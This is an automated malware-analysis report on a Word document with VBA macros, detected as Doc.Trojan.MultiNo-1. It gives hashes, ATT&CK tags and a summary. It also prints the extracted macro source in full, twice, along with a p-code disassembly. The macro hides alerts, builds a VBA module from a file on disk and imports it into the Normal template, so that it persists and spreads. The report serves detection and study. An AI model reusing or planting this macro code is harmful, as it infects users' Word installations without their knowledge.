Office (OLE) malware analysis — malicious · f3f971d71241fc68

MALICIOUS

Office (OLE)

27.5 KB Created: 1998-11-13 05:31:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14

MD5: beec664ee5be464a72f1ae41b0536ba6 SHA-1: 494d85b6a2edbed847a3b43d6e115c5ac00623d6 SHA-256: f3f971d71241fc6823a7cf0bd86b02fbb0ef10323ab1882e171cf825ffd61cee

80 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder

The sample is a malicious Office document containing VBA macros. The AutoExec subroutine attempts to read from 'c:\logoz.sys' and write to 'c:\logov.sys', modifying lines that start with ':' to prepend 'Print #1, "e"'. It then attempts to import 'c:\logov.sys' into the Normal template and save it, which is a common technique for establishing persistence or downloading further stages. The ClamAV detection 'Doc.Trojan.MultiNo-1' further supports its malicious nature.

Heuristics 2

ClamAV: Doc.Trojan.MultiNo-1 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.MultiNo-1
VBA macros detected medium OLE_VBA_MACROS

Document contains VBA macro code

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 3544 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	3544 bytes
SHA-256: `d86e89187dea4d2129ed12ba04c46d4e82a2b42b7135d0dde731c03f020ea281`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "iMultiNO" Sub AutoExec() On Error GoTo E Application.DisplayAlerts = False Application.EnableCancelKey = wdDisabled On Error GoTo make Open "c:\logov.sys" For Input As #1 Close 1 GoTo imprt make: On Error GoTo E Open "c:\logoz.sys" For Input As #1 Open "c:\logov.sys" For Output As #2 Do Line Input #1, a$ If Mid$(a$, 5, 1) = ":" Then a$ = "Print #1, " + Chr$(34) + "e" + Mid$(a$, 6, 29) + " " + Mid$(a$, 36, 23) + Chr$(34) Print #2, a$ Loop Until EOF(1) Close Kill "c:\logoz.sys" imprt: n = NormalTemplate.VBProject.VBComponents.Count For i = 1 To n If NormalTemplate.VBProject.VBComponents(i).Name = "MultiNO" Then GoTo E Next i NormalTemplate.VBProject.VBComponents.Import ("c:\logov.sys") NormalTemplate.Save E: End Sub ' Processing file: /opt/analyzer/scan_staging/b8f237aca28149bf8e30f01cf7dba471.bin ' =============================================================================== ' Module streams: ' Macros/VBA/ThisDocument - 965 bytes ' Macros/VBA/iMultiNO - 2138 bytes ' Line #0: ' FuncDefn (Sub AutoExec()) ' Line #1: ' OnError E ' Line #2: ' LitVarSpecial (False) ' Ld Application ' MemSt DisplayAlerts ' Line #3: ' Ld wdDisabled ' Ld Application ' MemSt EnableCancelKey ' Line #4: ' OnError make ' Line #5: ' LitStr 0x000C "c:\logov.sys" ' LitDI2 0x0001 ' Sharp ' LitDefault ' Open (For Input) ' Line #6: ' LitDI2 0x0001 ' Close 0x0001 ' Line #7: ' GoTo imprt ' Line #8: ' Label make ' Line #9: ' OnError E ' Line #10: ' LitStr 0x000C "c:\logoz.sys" ' LitDI2 0x0001 ' Sharp ' LitDefault ' Open (For Input) ' Line #11: ' LitStr 0x000C "c:\logov.sys" ' LitDI2 0x0002 ' Sharp ' LitDefault ' Open (For Output) ' Line #12: ' Do ' Line #13: ' LitDI2 0x0001 ' Ld a$ ' LineInput ' Line #14: ' Ld a$ ' LitDI2 0x0005 ' LitDI2 0x0001 ' ArgsLd Mid$$ 0x0003 ' LitStr 0x0001 ":" ' Eq ' If ' BoSImplicit ' LitStr 0x000A "Print #1, " ' LitDI2 0x0022 ' ArgsLd Chr$ 0x0001 ' Add ' LitStr 0x0001 "e" ' Add ' Ld a$ ' LitDI2 0x0006 ' LitDI2 0x001D ' ArgsLd Mid$$ 0x0003 ' Add ' LitStr 0x0001 " " ' Add ' Ld a$ ' LitDI2 0x0024 ' LitDI2 0x0017 ' ArgsLd Mid$$ 0x0003 ' Add ' LitDI2 0x0022 ' ArgsLd Chr$ 0x0001 ' Add ' St a$ ' EndIf ' Line #15: ' LitDI2 0x0002 ' Sharp ' PrintChan ' Ld a$ ' PrintItemNL ' Line #16: ' LitDI2 0x0001 ' ArgsLd EOF 0x0001 ' LoopUntil ' Line #17: ' CloseAll ' Line #18: ' LitStr 0x000C "c:\logoz.sys" ' ArgsCall Kill 0x0001 ' Line #19: ' Label imprt ' Line #20: ' Ld NormalTemplate ' MemLd VBProject ' MemLd VBComponents ' MemLd Count ' St n ' Line #21: ' StartForVariable ' Ld i ' EndForVariable ' LitDI2 0x0001 ' Ld n ' For ' Line #22: ' Ld i ' Ld NormalTemplate ' MemLd VBProject ' ArgsMemLd VBComponents 0x0001 ' MemLd New ' LitStr 0x0007 "MultiNO" ' Eq ' If ' BoSImplicit ' GoTo E ' EndIf ' Line #23: ' StartForVariable ' Ld i ' EndForVariable ' NextVar ' Line #24: ' LitStr 0x000C "c:\logov.sys" ' Paren ' Ld NormalTemplate ' MemLd VBProject ' MemLd VBComponents ' ArgsMemCall Import 0x0001 ' Line #25: ' Ld NormalTemplate ' ArgsMemCall Save 0x0000 ' Line #26: ' Label E ' Line #27: ' EndSub

SHA-256: d86e89187dea4d2129ed12ba04c46d4e82a2b42b7135d0dde731c03f020ea281

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "iMultiNO"
Sub AutoExec()
On Error GoTo E
Application.DisplayAlerts = False
Application.EnableCancelKey = wdDisabled
On Error GoTo make
Open "c:\logov.sys" For Input As #1
Close 1
GoTo imprt
make:
On Error GoTo E
Open "c:\logoz.sys" For Input As #1
Open "c:\logov.sys" For Output As #2
Do
Line Input #1, a$
If Mid$(a$, 5, 1) = ":" Then a$ = "Print #1, " + Chr$(34) + "e" + Mid$(a$, 6, 29) + " " + Mid$(a$, 36, 23) + Chr$(34)
Print #2, a$
Loop Until EOF(1)
Close
Kill "c:\logoz.sys"
imprt:
n = NormalTemplate.VBProject.VBComponents.Count
For i = 1 To n
If NormalTemplate.VBProject.VBComponents(i).Name = "MultiNO" Then GoTo E
Next i
NormalTemplate.VBProject.VBComponents.Import ("c:\logov.sys")
NormalTemplate.Save
E:
End Sub

' Processing file: /opt/analyzer/scan_staging/b8f237aca28149bf8e30f01cf7dba471.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 965 bytes
' Macros/VBA/iMultiNO - 2138 bytes
' Line #0:
' 	FuncDefn (Sub AutoExec())
' Line #1:
' 	OnError E 
' Line #2:
' 	LitVarSpecial (False)
' 	Ld Application 
' 	MemSt DisplayAlerts 
' Line #3:
' 	Ld wdDisabled 
' 	Ld Application 
' 	MemSt EnableCancelKey 
' Line #4:
' 	OnError make 
' Line #5:
' 	LitStr 0x000C "c:\logov.sys"
' 	LitDI2 0x0001 
' 	Sharp 
' 	LitDefault 
' 	Open (For Input)
' Line #6:
' 	LitDI2 0x0001 
' 	Close 0x0001 
' Line #7:
' 	GoTo imprt 
' Line #8:
' 	Label make 
' Line #9:
' 	OnError E 
' Line #10:
' 	LitStr 0x000C "c:\logoz.sys"
' 	LitDI2 0x0001 
' 	Sharp 
' 	LitDefault 
' 	Open (For Input)
' Line #11:
' 	LitStr 0x000C "c:\logov.sys"
' 	LitDI2 0x0002 
' 	Sharp 
' 	LitDefault 
' 	Open (For Output)
' Line #12:
' 	Do 
' Line #13:
' 	LitDI2 0x0001 
' 	Ld a$ 
' 	LineInput 
' Line #14:
' 	Ld a$ 
' 	LitDI2 0x0005 
' 	LitDI2 0x0001 
' 	ArgsLd Mid$$ 0x0003 
' 	LitStr 0x0001 ":"
' 	Eq 
' 	If 
' 	BoSImplicit 
' 	LitStr 0x000A "Print #1, "
' 	LitDI2 0x0022 
' 	ArgsLd Chr$ 0x0001 
' 	Add 
' 	LitStr 0x0001 "e"
' 	Add 
' 	Ld a$ 
' 	LitDI2 0x0006 
' 	LitDI2 0x001D 
' 	ArgsLd Mid$$ 0x0003 
' 	Add 
' 	LitStr 0x0001 " "
' 	Add 
' 	Ld a$ 
' 	LitDI2 0x0024 
' 	LitDI2 0x0017 
' 	ArgsLd Mid$$ 0x0003 
' 	Add 
' 	LitDI2 0x0022 
' 	ArgsLd Chr$ 0x0001 
' 	Add 
' 	St a$ 
' 	EndIf 
' Line #15:
' 	LitDI2 0x0002 
' 	Sharp 
' 	PrintChan 
' 	Ld a$ 
' 	PrintItemNL 
' Line #16:
' 	LitDI2 0x0001 
' 	ArgsLd EOF 0x0001 
' 	LoopUntil 
' Line #17:
' 	CloseAll 
' Line #18:
' 	LitStr 0x000C "c:\logoz.sys"
' 	ArgsCall Kill 0x0001 
' Line #19:
' 	Label imprt 
' Line #20:
' 	Ld NormalTemplate 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	MemLd Count 
' 	St n 
' Line #21:
' 	StartForVariable 
' 	Ld i 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	Ld n 
' 	For 
' Line #22:
' 	Ld i 
' 	Ld NormalTemplate 
' 	MemLd VBProject 
' 	ArgsMemLd VBComponents 0x0001 
' 	MemLd New 
' 	LitStr 0x0007 "MultiNO"
' 	Eq 
' 	If 
' 	BoSImplicit 
' 	GoTo E 
' 	EndIf 
' Line #23:
' 	StartForVariable 
' 	Ld i 
' 	EndForVariable 
' 	NextVar 
' Line #24:
' 	LitStr 0x000C "c:\logov.sys"
' 	Paren 
' 	Ld NormalTemplate 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemCall Import 0x0001 
' Line #25:
' 	Ld NormalTemplate 
' 	ArgsMemCall Save 0x0000 
' Line #26:
' 	Label E 
' Line #27:
' 	EndSub

Open this report in the interactive analyzer, or submit your own file for analysis.